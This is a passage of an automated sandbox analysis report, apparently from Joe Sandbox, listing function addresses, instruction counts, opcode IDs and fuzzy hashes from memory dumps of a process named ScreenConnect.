Opcode Fuzzy Hash: e1901a858d7097346f201f5a57ec9639fb6ffd2f3833c27b4ab12f93ebdd9702
Instruction Fuzzy Hash: D791543470DA4A8FDBDDEF58C4A0AA177E2FF99304B2445A9C059CB69BCA25E847C740

Function 00007FFD9B899C15 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a28ae7ce8f3deabf80cb7c5aca6ce1031ab8101687ce1d975139a624d0a19b9
Instruction ID: 3b1d0c8b16dc2052c194fce46d63831c8434b1ef659c35bfb9088c4ba66f5102
Opcode Fuzzy Hash: 8a28ae7ce8f3deabf80cb7c5aca6ce1031ab8101687ce1d975139a624d0a19b9
Instruction Fuzzy Hash: C991E330719A4E8FDF98DF68C8A46A53BE1FF9D314B1506ADD459C73A2DA35E802C740

Function 00007FFD9B89F395 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d96245496e5f27ec153ca6e6465cbcc60687494be570b656d5747eed2c8842
Instruction ID: 74c1bc1c32060ab0677982a55ac07b170bfb69806da40804958403dbc9101f6b
Opcode Fuzzy Hash: 41d96245496e5f27ec153ca6e6465cbcc60687494be570b656d5747eed2c8842
Instruction Fuzzy Hash: DE916F31718E4E8FDF98EF18C8A0AA677E1FF99304B1545A9D41EC7296DA35F842CB40

Function 00007FFD9BBA21F9 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3cf2521e511beed1bb1b7301b8c8922d343502b2912e5f8d72d9489e655f68
Instruction ID: c726f76bdcff4fdde9a5d4b17fae601c8fddb344546ddaf17c1d38e5b9f6d2d2
Opcode Fuzzy Hash: ee3cf2521e511beed1bb1b7301b8c8922d343502b2912e5f8d72d9489e655f68
Instruction Fuzzy Hash: 29814872B0EA894FEB98EE689861AA577D2FFA5344B0401BDD05DC71D7EE25F802C740

Function 00007FFD9BBA4993 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c096d5637e467648f27f4ec9750cb04c001a3c8d9abd9ab763dc14ad69aff9f3
Instruction ID: e1b81a93f37c8fafc4997b3fd7b4531df0d7ffb7ed2498083f3e941fb73b3e9b
Opcode Fuzzy Hash: c096d5637e467648f27f4ec9750cb04c001a3c8d9abd9ab763dc14ad69aff9f3
Instruction Fuzzy Hash: CD71C232E0DA0E4BEB68EA18D4A29F973D1FF64304B81457DD45E835D6EE24FA06C781

Function 00007FFD9BBAB815 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4bb097f4e3ce77b1c2b04b4a506be315a7fcca032e4b0b455054c1f21c253e
Instruction ID: ad16f2eac757315ec14ac7d852c9ed55cbd61e8c6a363fde665219091aa2be8f
Opcode Fuzzy Hash: 4f4bb097f4e3ce77b1c2b04b4a506be315a7fcca032e4b0b455054c1f21c253e
Instruction Fuzzy Hash: 4881A431A18A4D8FDFA4DF58C4B0AA977E1FF58314B1546A9D42DC72D2CB35E902CB40

Function 00007FFD9B8A18A5 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676b86a767615f683b1b4cc54d775cdbac63dc29180f99f3a250cad6d70376f4
Instruction ID: 7bc8ae66ae94b6ea1e1e8dfc787f4b28e5a85b9f60639be4ff92ebf6d9ddc1bc
Opcode Fuzzy Hash: 676b86a767615f683b1b4cc54d775cdbac63dc29180f99f3a250cad6d70376f4
Instruction Fuzzy Hash: 0F614932F1EA090FEB68A7A868B15B877D1EF4E350F06017EE49DC31F2DD196901C251

Function 00007FFD9B89755E Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee273c4a629d83a83631251ed9a277ba5bf7f58d5654c1332bd924b0e5f3800
Instruction ID: d394fe3742853c9800e398bddcc77f77970d98c5b7cec563628d890915c86438
Opcode Fuzzy Hash: 2ee273c4a629d83a83631251ed9a277ba5bf7f58d5654c1332bd924b0e5f3800
Instruction Fuzzy Hash: 7561F531F1E90D4BEF68EBAC98256BD77D1EF89310F11017AE04EC32D6DE29A9028741

Function 00007FFD9BBA66B7 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216c92a68780cea07efd24ecfe00f60973f1d2e2d264cc596bef5cbd2949d5d5
Instruction ID: 8357e9c0325f837ac6b6490277aaca6bb318c3c3362eca93bb102f2c47e05628
Opcode Fuzzy Hash: 216c92a68780cea07efd24ecfe00f60973f1d2e2d264cc596bef5cbd2949d5d5
Instruction Fuzzy Hash: F5719371F1AE1F4AEB79E7A480756BD62D2FF98348F560039D40FC21E6DD28BA428240

Function 00007FFD9B89BAD3 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 132ad8e05bb10774b3a1e6cdf5a2c5c590208dacfbd1931e34e8df76f060df97
Instruction ID: c096c52891980022e194167bdf5420a3cb38a89cf866dbace71d12705fed1d38
Opcode Fuzzy Hash: 132ad8e05bb10774b3a1e6cdf5a2c5c590208dacfbd1931e34e8df76f060df97
Instruction Fuzzy Hash: 84615A31B0EE4E4FEFA8EB5CC868A657BD0EF58754B1441BAD00DC71A6ED25ED028781

Function 00007FFD9B89E705 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b95bd7e411e08c1ea1f418edfe43f40c0ae49c96f7fc6cfa02d45e2f084b6af
Instruction ID: af8bd9918a42b6832dd1581c242126080349b2768a9920b61d364ac8cab88552
Opcode Fuzzy Hash: 4b95bd7e411e08c1ea1f418edfe43f40c0ae49c96f7fc6cfa02d45e2f084b6af
Instruction Fuzzy Hash: E9515A21B1E6CD4FDB6A9B7488755B83FA1EF5A200B5940FBD099C70E7DD28690AC302

Function 00007FFD9B89C1F5 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43da1518c193f2be18ac51bb43acb0fd929bca18911c8ba5b082a26c22667bda
Instruction ID: 8437d97b2a7c31f8d14df350054e591b06cfee0f7834afc7f46c1280a77ecaea
Opcode Fuzzy Hash: 43da1518c193f2be18ac51bb43acb0fd929bca18911c8ba5b082a26c22667bda
Instruction Fuzzy Hash: C261C430719B4E8FCFD8DF68C8A46A537A1FF5D304B1101ADD419CB296CA36E902CB40

Function 00007FFD9BBAACC8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c08da11abec5beb690d3a96c371ccd6cc81393eb097309aec0b5b450ad7dcd8
Instruction ID: d4019f391b05ec54140f03db9aef4631ae489baa48f2452e066e0179d9f91de6
Opcode Fuzzy Hash: 2c08da11abec5beb690d3a96c371ccd6cc81393eb097309aec0b5b450ad7dcd8
Instruction Fuzzy Hash: E0516931F0DE894FDB5CAB28986166877D1FF98710B1501BEE099C32E7DE24B8028781

Function 00007FFD9BBAD278 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac8229141e974ddb581b69814677b98a8738efe47edf3d50fa7d4533ae6cf0c
Instruction ID: 5911ce9ee1326b8d64dfa7bebf693231ce88b2b3e47a7ca4add913b904390b72
Opcode Fuzzy Hash: 4ac8229141e974ddb581b69814677b98a8738efe47edf3d50fa7d4533ae6cf0c
Instruction Fuzzy Hash: 1D51B431B199494FE768EB68C469B7977D1FF98304F0541BEE04EC32E2DE64A9068741

Function 00007FFD9B899A10 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17aedae27321c20fe158aae57bef95e5f33a7eaf325a1e24c6e2d71d343f1f33
Instruction ID: 68c7c2e425c4f668c7b7533f9b0d314de9922df530accfa4082318345e7b0a21
Opcode Fuzzy Hash: 17aedae27321c20fe158aae57bef95e5f33a7eaf325a1e24c6e2d71d343f1f33
Instruction Fuzzy Hash: FE413822B1EE5E0FEFACE65C24695792BC2DBAC79071545BBD40DC739AEC14AC024380

Function 00007FFD9B8A16D4 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb819e1f33a74181d884fccd61a5255edccb075060253c1705443ed29aea3528
Instruction ID: e1ac50953f9114f62d2da52453bd30348b292ccc06a6a35c0d8f7e2de8692a55
Opcode Fuzzy Hash: bb819e1f33a74181d884fccd61a5255edccb075060253c1705443ed29aea3528
Instruction Fuzzy Hash: E5512430719A8D8FDBA8EB6CD8A5A6577E2EF5930074541B9D08EC71A7DE28FC42C740

Function 00007FFD9B891630 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ad894e071ba83ccd5d78590d9dbfb43aca955422cb00e866ebe5fea65fa089
Instruction ID: 57b704956fd6e3d2ff438b683f0f27d091f3db0685085e41232a756081e344b3
Opcode Fuzzy Hash: c2ad894e071ba83ccd5d78590d9dbfb43aca955422cb00e866ebe5fea65fa089
Instruction Fuzzy Hash: 30511531B09E4E4FDBA0EF688455AB677E1FFA9310F15017AD40DD32A1DE28E942C790

Function 00007FFD9B89C449 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64118eae653a7601923bd67d19a36adb01caebd43925613460e59a78a49c0c5
Instruction ID: cc365d72fd78730f9cab10295ded3f99adb82b4a0cdc46de7090a32cf77f209f
Opcode Fuzzy Hash: c64118eae653a7601923bd67d19a36adb01caebd43925613460e59a78a49c0c5
Instruction Fuzzy Hash: 0251A371719A4E4FDF98DF18C8646B93BA1FF9C304B1505A9D45DC72E2CA36E912CB40

Function 00007FFD9B8A0D00 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e1424ec3359afe2df063106937bf09ad87f88a104f0f03460d82202bc698c7
Instruction ID: a882190c1bf1af694b65fe98a68e0bf8fa608005ea4d7edbda0446f4e2235ade
Opcode Fuzzy Hash: f1e1424ec3359afe2df063106937bf09ad87f88a104f0f03460d82202bc698c7
Instruction Fuzzy Hash: 3F415732B2AA1D8FEFA4DB9CA4952B973E1EF9C750B01017AD00DC7261DE25AC028791

Function 00007FFD9B89CCC8 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b23ebea2b9b8fe45fe051c664283a02720813a8371d296b63f46fec90770f42d
Instruction ID: f1a2aa7eb21ff4b40b67ad49657b49a17ebf828985ef834a3317b13b058f1e03
Opcode Fuzzy Hash: b23ebea2b9b8fe45fe051c664283a02720813a8371d296b63f46fec90770f42d
Instruction Fuzzy Hash: 6251C331B19E4E4FDFE8EB1CC465A6677D1EFA8744B1041BAD00DC72A6EE25ED028781

Function 00007FFD9B898AA3 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88739828b8132e25f3e086687b5cc389263a5dd33d185c3af1957b966c7f28ec
Instruction ID: e36803868bdf8dcb02c2ce8699e00d92729e0f8e0f94c4c639dcdb13c6519cad
Opcode Fuzzy Hash: 88739828b8132e25f3e086687b5cc389263a5dd33d185c3af1957b966c7f28ec
Instruction Fuzzy Hash: 1D513821B1EB8F0FDBA99B6898755B97FE0EF4934070905FBD009C71E7ED28A9068341

Function 00007FFD9B89E477 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12111203f52874e710ef57ad076dbad26555b6a53c97f80c9c634abbfdf9886b
Instruction ID: dc076b8f71b02efa5ae317caf64de02b1990404d1992063a1895510bbc9c3ba6
Opcode Fuzzy Hash: 12111203f52874e710ef57ad076dbad26555b6a53c97f80c9c634abbfdf9886b
Instruction Fuzzy Hash: 0F412932B1DD4A4BEF6CAB5CA4619B8B7D1EFA835071041BED05EC35DBED24F8464281

Function 00007FFD9BBA7E40 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2628ca156c3d0ed9f3027ee396e440f536179c34cd083c1d255cd10c09a6eab9
Instruction ID: 967ade7fbf309cd595ca147f2530990525dae382951af4df40898efbc105b913
Opcode Fuzzy Hash: 2628ca156c3d0ed9f3027ee396e440f536179c34cd083c1d255cd10c09a6eab9
Instruction Fuzzy Hash: 7C410A73F0EE8D4FEB659A99A8601E977E1FF94314F0505BAE04DC31F2DE2569068341

Function 00007FFD9B890E68 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c907476ce8d7873e961cb99460fa7a555874eddba6aaa30022a4245c87353046
Instruction ID: 15d62a4ceb5526e153b99c8f514c61bcf34025f085e4a9c8e15b25c4d1461d8c
Opcode Fuzzy Hash: c907476ce8d7873e961cb99460fa7a555874eddba6aaa30022a4245c87353046
Instruction Fuzzy Hash: 5D41F432F0DA4D4BEFA8DB6C98656A8BBD2EF98300F15417AD05DD32D2CE246D428781

Function 00007FFD9B897E8D Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc80f62191399ac1ecd29842483d7b3a8ea373ffaf5d17d575ff6a23cb49f7f
Instruction ID: eb64293d9eae860132e648f02695e82a425d21cd86ea9551124c3dd0a2339387
Opcode Fuzzy Hash: cbc80f62191399ac1ecd29842483d7b3a8ea373ffaf5d17d575ff6a23cb49f7f
Instruction Fuzzy Hash: 45512431A0CB4C8FDB69DB68D845BE8BBE0EF59320F0042AFD049D3691CB756946CB91

Function 00007FFD9BBA7C6C Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 212e6ee598c4e145dceea7f8505538281ae51050ac7ef2f572451e3504be51b8
Instruction ID: 85c6910b19ba3b0e30ba7ed4e164f1ac3b5280c2d24cb516c087e9fbfbedf91e
Opcode Fuzzy Hash: 212e6ee598c4e145dceea7f8505538281ae51050ac7ef2f572451e3504be51b8
Instruction Fuzzy Hash: 3F4133A2B1EECE0FD79A976C18601B47BD1FF9521431901FAD098C71EBED18A9468341

Function 00007FFD9B891720 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b986cf86fd36795ec2c162f20039eb9982a194d87e6071d2fda902b13af1b7af
Instruction ID: 6f27e6de6c2131848df8a6aa79646d37b5e0dbd466e2b8a3b13c0c27d71863f8
Opcode Fuzzy Hash: b986cf86fd36795ec2c162f20039eb9982a194d87e6071d2fda902b13af1b7af
Instruction Fuzzy Hash: 69412B21F29D4E4FEBA8EB6C5464AB873D2EF9C744B554176E05DC32E6EE24AC424340

Function 00007FFD9B899E79 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68909abaadc068b6e8cfb1988ddbabbd8343dd050e5780aea306ff5d689a6825
Instruction ID: c6d84158d0c436afc0228b7c2f7d3d00471e9fc6c3c59da085cf8dfeca14b620
Opcode Fuzzy Hash: 68909abaadc068b6e8cfb1988ddbabbd8343dd050e5780aea306ff5d689a6825
Instruction Fuzzy Hash: 94519131619A4E8FDF98DF58C864AA97BA1FF98304B150AADE41DC72E2DB35E911C700

Function 00007FFD9B897A76 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19112958f287626192f1be29d89b02a1b0518fe481931c8d9db029e127ff2a01
Instruction ID: e3643cf3efc34b2a2017bc7a5beb68b622c379fa172cb80d43ff0ff24b0d67a4
Opcode Fuzzy Hash: 19112958f287626192f1be29d89b02a1b0518fe481931c8d9db029e127ff2a01
Instruction Fuzzy Hash: A6412621A0EACD5FEB2697785C355A47FB1EF8B250B0A41E7D088C70F7DE18A946C352

Function 00007FFD9BBA9E61 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 897ca53822a807da50b80a067bb44a924ecca14145eb3366263300ddb929effb
Instruction ID: 752a0a875076cf03bdaceeea5afe73cb1568e0925300c25dfbf8578323707bd0
Opcode Fuzzy Hash: 897ca53822a807da50b80a067bb44a924ecca14145eb3366263300ddb929effb
Instruction Fuzzy Hash: B6411621B1DA494FEB98EBAC8469AB577D1FF98304F05417AD09DC32E7DD29B9428301

Function 00007FFD9BBABB05 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b29066890444f0b0f1a8aa6bf732bcc446cf967395d150a293db2491b8c75e49
Instruction ID: b0bf98bd2436dc05c57d1f8123fc4fcee616206d76d2d3041a5f7d3b14d73ef0
Opcode Fuzzy Hash: b29066890444f0b0f1a8aa6bf732bcc446cf967395d150a293db2491b8c75e49
Instruction Fuzzy Hash: 3541AF71719A898FCBA8CF288874A6937E1FF58308B150599E46DC72E2DB35E802CB00

Function 00007FFD9BBA4E89 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0940067fc2c747056a904d0bf3dcf75aa424b6f3ae16650bd8f3005608956f9b
Instruction ID: 7b2f407acfde57f7705412f10706b5189f39c23f43772a85977746fa74fe062e
Opcode Fuzzy Hash: 0940067fc2c747056a904d0bf3dcf75aa424b6f3ae16650bd8f3005608956f9b
Instruction Fuzzy Hash: DD418771709A8D8FDB98DF18C8A4A6537E1FF58318B1505ADE46DC72E2DB31E952C700

Function 00007FFD9B8A1D3D Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df83b0ef8d717ba0dbd1ceaac9b0c6ead68b6fbb71344eb2145cb695abf8eabe
Instruction ID: 997685dd60c3e20a8e7797cddd638861bfd62647d50668ce9b21cf6c445a1fec
Opcode Fuzzy Hash: df83b0ef8d717ba0dbd1ceaac9b0c6ead68b6fbb71344eb2145cb695abf8eabe
Instruction Fuzzy Hash: 59411971A1EACD8FD765EB6888694A97FF0FF5A300B0501EBE448C71A3DA24AD05C741

Function 00007FFD9B897D36 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45f3256d3f0ce2e3276ec632c1c33cd5c7ae0a2292bbb0db1ffb4ffc1914f96
Instruction ID: 3ebf1ce1a978af23b708bc96b959f5770dde01be29cf03ccab5d4d010a7000c1
Opcode Fuzzy Hash: e45f3256d3f0ce2e3276ec632c1c33cd5c7ae0a2292bbb0db1ffb4ffc1914f96
Instruction Fuzzy Hash: 0C319B3564E28D2FEB2667749C265FA3FA4DF42320F0501FBE459C70E3DA1D660683A2

Function 00007FFD9BBAD7C9 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2bea5d84c19a60b48d9933f472734cbb83dba3b42b1781b1450690df4e6b02
Instruction ID: b6b0d5f9549abe8163335cc1594b6fd40b5dd2c244dc595b940b07a3587dec9d
Opcode Fuzzy Hash: 6c2bea5d84c19a60b48d9933f472734cbb83dba3b42b1781b1450690df4e6b02
Instruction Fuzzy Hash: 4031E562F0ED4E0BE76CA66C68755B8B7C1FF54264B0901BEE09EC31E7ED19A9078341

Function 00007FFD9B897513 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c3a1f74eb794325de6b882bef4833c1c7047c48fc79faec2b98f0e4c1984171
Instruction ID: 8828b95d96399bfa1d6e2bd969ee2d5bc4960ae20b381c0178e49b9f2a4528b2
Opcode Fuzzy Hash: 2c3a1f74eb794325de6b882bef4833c1c7047c48fc79faec2b98f0e4c1984171
Instruction Fuzzy Hash: 3431D836F1E61D4EEB78AB9894515BD37D1EB89320F11013AD05EC31E6DE25B9428340

Function 00007FFD9BBAEBD2 Relevance: .1, Instructions: 121COMMON

